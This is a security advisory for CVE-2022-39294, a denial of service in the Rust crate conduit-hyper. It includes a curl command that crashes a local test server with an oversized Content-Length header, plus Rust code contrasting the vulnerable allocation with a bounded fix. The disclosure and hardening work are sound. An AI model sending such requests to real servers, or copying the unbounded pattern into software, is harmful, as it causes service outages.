JFrog Security Research

- conduit-hyper missing request size limit DoS

CVE-2022-39294 | CVSS 7.5

JFrog Severity: high

Published 1 Nov. 2022 | Last updated 1 Nov. 2022

A missing request body size limit for HTTP requests in conduit-hyper can allow network attackers to cause a denial of service.

conduit-hyper

[0.2.0-alpha.3, 0.4.2), fixed in 0.4.2

conduit-hyper would not, by default, set a limit on the size of the request body. That meant that if a malicious peer sent a request with a very large Content-Length header (even if the body itself was not very large), the Rust allocator would panic (due to a failed allocation) and the process would crash.

git clone https://github.com/conduit-rust/conduit-hyper

cd conduit-hyper && cargo run --example server

curl -v -X PUT "http://127.0.0.1:12345/" --data `python3 -c "import sys; sys.stdout.write('a'*10000)"` -H "Content-Length: 11111111111111111111"
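To make the failure mode concrete, the following standard-library Rust sketch is an added example; it is not conduit-hyper's code nor its 0.4.2 fix. It places the vulnerable pattern (reserving memory sized by the untrusted Content-Length header) beside a hardened reader that validates the declared length against a configured limit before allocating and then caps the read at exactly that many bytes. The function names, the `BodyError` type and the 8 MiB limit are assumptions for the example; the 20-digit Content-Length in `main` mirrors the reproduction above.

```rust
use std::io::{self, Read};

/// Largest request body this server is willing to buffer in memory.
/// The 8 MiB figure is an assumption for this example, not a conduit-hyper default.
pub const MAX_BODY_BYTES: u64 = 8 * 1024 * 1024;

#[derive(Debug, PartialEq)]
pub enum BodyError {
    /// Content-Length is not a plain run of ASCII digits.
    BadContentLength,
    /// The declared length exceeds the configured limit (HTTP 413 territory).
    TooLarge,
    /// The peer closed the connection before sending the declared number of bytes.
    Truncated,
    Io(io::ErrorKind),
}

/// Parse Content-Length strictly: digits only, no sign. A value that does not
/// even fit in a u64 is reported as too large rather than as a parse error.
pub fn parse_content_length(value: &str) -> Result<u64, BodyError> {
    let v = value.trim();
    if v.is_empty() || !v.bytes().all(|b| b.is_ascii_digit()) {
        return Err(BodyError::BadContentLength);
    }
    v.parse::<u64>().map_err(|_| BodyError::TooLarge)
}

/// VULNERABLE PATTERN (shown for contrast; never call it with an untrusted length):
/// the header value alone decides how much memory to reserve. A 20-digit
/// Content-Length becomes a multi-exabyte allocation request, the allocation
/// fails, and the process dies before a single body byte has been read.
pub fn read_body_trusting_header<R: Read>(reader: &mut R, declared: u64) -> io::Result<Vec<u8>> {
    let mut buf = Vec::with_capacity(declared as usize);
    reader.read_to_end(&mut buf)?;
    Ok(buf)
}

/// HARDENED PATTERN: check the declared length against `limit` before any
/// allocation, then cap the reader at exactly that many bytes so the peer can
/// neither announce more than allowed nor stream more than it announced.
pub fn read_body_bounded<R: Read>(
    reader: &mut R,
    content_length: &str,
    limit: u64,
) -> Result<Vec<u8>, BodyError> {
    let declared = parse_content_length(content_length)?;
    if declared > limit {
        // Rejected up front: nothing has been allocated yet, so an oversized
        // header costs the server only a 413 response.
        return Err(BodyError::TooLarge);
    }
    // Capacity is now bounded by `limit`, so with_capacity cannot be driven
    // into an allocation failure by the header.
    let mut buf = Vec::with_capacity(declared as usize);
    reader
        .take(declared)
        .read_to_end(&mut buf)
        .map_err(|e| BodyError::Io(e.kind()))?;
    if (buf.len() as u64) < declared {
        return Err(BodyError::Truncated);
    }
    Ok(buf)
}

fn main() {
    // Constructed input mirroring the reproduction: a 10 000-byte body
    // announced with a 20-digit Content-Length.
    let payload = vec![b'a'; 10_000];
    let mut stream: &[u8] = &payload;
    match read_body_bounded(&mut stream, "11111111111111111111", MAX_BODY_BYTES) {
        Err(BodyError::TooLarge) => println!("rejected with 413 before allocating anything"),
        other => println!("unexpected result: {:?}", other),
    }
}
```

The important ordering is validate, then allocate, then read: the `Truncated` branch also covers the opposite mismatch, where a peer declares more bytes than it delivers, so the handler does not hand a short body to application code as if it were complete.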

No mitigations are provided for this vulnerability.

In order to fully fix this vulnerability, we recommend upgrading conduit-hyper to version 0.4.2.

GHSA